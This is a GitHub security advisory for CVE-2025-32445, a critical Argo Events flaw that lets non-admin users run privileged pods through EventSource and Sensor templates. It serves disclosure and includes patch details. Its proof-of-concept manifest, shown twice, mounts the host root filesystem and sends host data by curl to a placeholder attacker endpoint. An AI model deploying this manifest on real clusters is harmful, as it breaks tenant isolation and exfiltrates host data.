ghsa-hmp7-x699-cvhq
Vulnerability from github
Summary:
A user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges.
Details:
The EventSource and Sensor CRs allow the corresponding orchestrated pod to be customized with spec.template and spec.template.container (with type k8s.io/api/core/v1.Container), thus, any specification under container such as command, args, securityContext, volumeMount can be specified, and applied to the EventSource or Sensor pod due to the code logic below.
golang
if args.EventSource.Spec.Template != nil && args.EventSource.Spec.Template.Container != nil {
if err := mergo.Merge(&eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil {
return nil, err
}
}
With these, A user would be able to gain privileged access to the cluster host, if he/she specified the EventSource/Sensor CR with some particular properties under template.
Here is an example that demonstrates the vulnerability.
apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
name: poc-vulnerable-eventsource
spec:
webhook:
security-test:
port: "12000"
endpoint: "/webhook"
template:
container:
image: ubuntu:latest
command: ["/bin/bash"]
args: [
"-c",
"apt-get update && apt-get install -y curl && while true; do
rm -f /tmp/data;
echo '=== containerd socket ===' > /tmp/data 2>&1;
ls -la /host/run/containerd/containerd.sock >> /tmp/data 2>&1;
echo '=== proof of host access ===' >> /tmp/data 2>&1;
cat /host/etc/hostname >> /tmp/data 2>&1;
curl -X POST --data-binary @/tmp/data http://<attacker-controlled-endpoint>:8000/;
sleep 300;
done"
]
securityContext:
privileged: true
capabilities:
add: ["SYS_ADMIN"]
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
Impact:
- Multi-tenant Clusters:
- Tenant isolation broken
- Non-admin users can gain host/cluster access
-
Access to other tenants' data
-
Security Model Bypass:
- RBAC restrictions circumvented
- Pod Security Policies/Standards bypassed
- Host system compromised
Patches
A patch for this vulnerability has been released in the following Argo Events version , which only limited properties under spec.template.container are allowed.
v1.9.6
Credits
This vulnerability was found & reported by:
@thevilledev
The Argo team would like to thank him for his responsible disclosure and constructive communications during the resolve of this issue.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-events"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-32445"
],
"database_specific": {
"cwe_ids": [
"CWE-250",
"CWE-268"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-14T17:47:39Z",
"nvd_published_at": "2025-04-15T20:15:39Z",
"severity": "CRITICAL"
},
"details": "### Summary:\n\nA user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges.\n\n### Details:\n\nThe `EventSource` and `Sensor` CRs allow the corresponding orchestrated pod to be customized with `spec.template` and `spec.template.container` (with type `k8s.io/api/core/v1.Container`), thus, any specification under `container` such as `command`, `args`, `securityContext `, `volumeMount` can be specified, and applied to the EventSource or Sensor pod due to the code logic below.\n\n```golang\n if args.EventSource.Spec.Template != nil \u0026\u0026 args.EventSource.Spec.Template.Container != nil {\n if err := mergo.Merge(\u0026eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil {\n return nil, err\n }\n }\n```\n\nWith these, A user would be able to gain privileged access to the cluster host, if he/she specified the EventSource/Sensor CR with some particular properties under `template`.\n\nHere is an example that demonstrates the vulnerability.\n\n```\napiVersion: argoproj.io/v1alpha1\nkind: EventSource\nmetadata:\n name: poc-vulnerable-eventsource\nspec:\n webhook:\n security-test:\n port: \"12000\"\n endpoint: \"/webhook\"\n template:\n container:\n image: ubuntu:latest\n command: [\"/bin/bash\"]\n args: [\n \"-c\",\n \"apt-get update \u0026\u0026 apt-get install -y curl \u0026\u0026 while true; do\n rm -f /tmp/data;\n echo \u0027=== containerd socket ===\u0027 \u003e /tmp/data 2\u003e\u00261;\n ls -la /host/run/containerd/containerd.sock \u003e\u003e /tmp/data 2\u003e\u00261;\n echo \u0027=== proof of host access ===\u0027 \u003e\u003e /tmp/data 2\u003e\u00261;\n cat /host/etc/hostname \u003e\u003e /tmp/data 2\u003e\u00261;\n curl -X POST --data-binary @/tmp/data http://\u003cattacker-controlled-endpoint\u003e:8000/;\n sleep 300;\n done\"\n ]\n securityContext:\n privileged: true\n capabilities:\n add: [\"SYS_ADMIN\"]\n volumeMounts:\n - name: host-root\n mountPath: /host\n volumes:\n - name: host-root\n hostPath:\n path: /\n```\n\n### Impact:\n\n- Multi-tenant Clusters:\n - Tenant isolation broken\n - Non-admin users can gain host/cluster access\n - Access to other tenants\u0027 data\n\n- Security Model Bypass:\n - RBAC restrictions circumvented\n - Pod Security Policies/Standards bypassed\n - Host system compromised\n\n### Patches\n\nA [patch](https://github.com/argoproj/argo-events/pull/3528) for this vulnerability has been released in the following Argo Events version , which only limited properties under `spec.template.container` are allowed.\n\n`v1.9.6`\n\n### Credits\n\nThis vulnerability was found \u0026 reported by:\n\n@thevilledev\n\nThe Argo team would like to thank him for his responsible disclosure and constructive communications during the resolve of this issue.",
"id": "GHSA-hmp7-x699-cvhq",
"modified": "2025-04-23T15:07:31Z",
"published": "2025-04-14T17:47:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-events/security/advisories/GHSA-hmp7-x699-cvhq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32445"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-events/pull/3528"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-events/commit/18412293a699f559848b00e6e459c9ce2de0d3e2"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-events"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3608"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Argo Events users can gain privileged access to the host system and cluster with EventSource and Sensor CR "
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.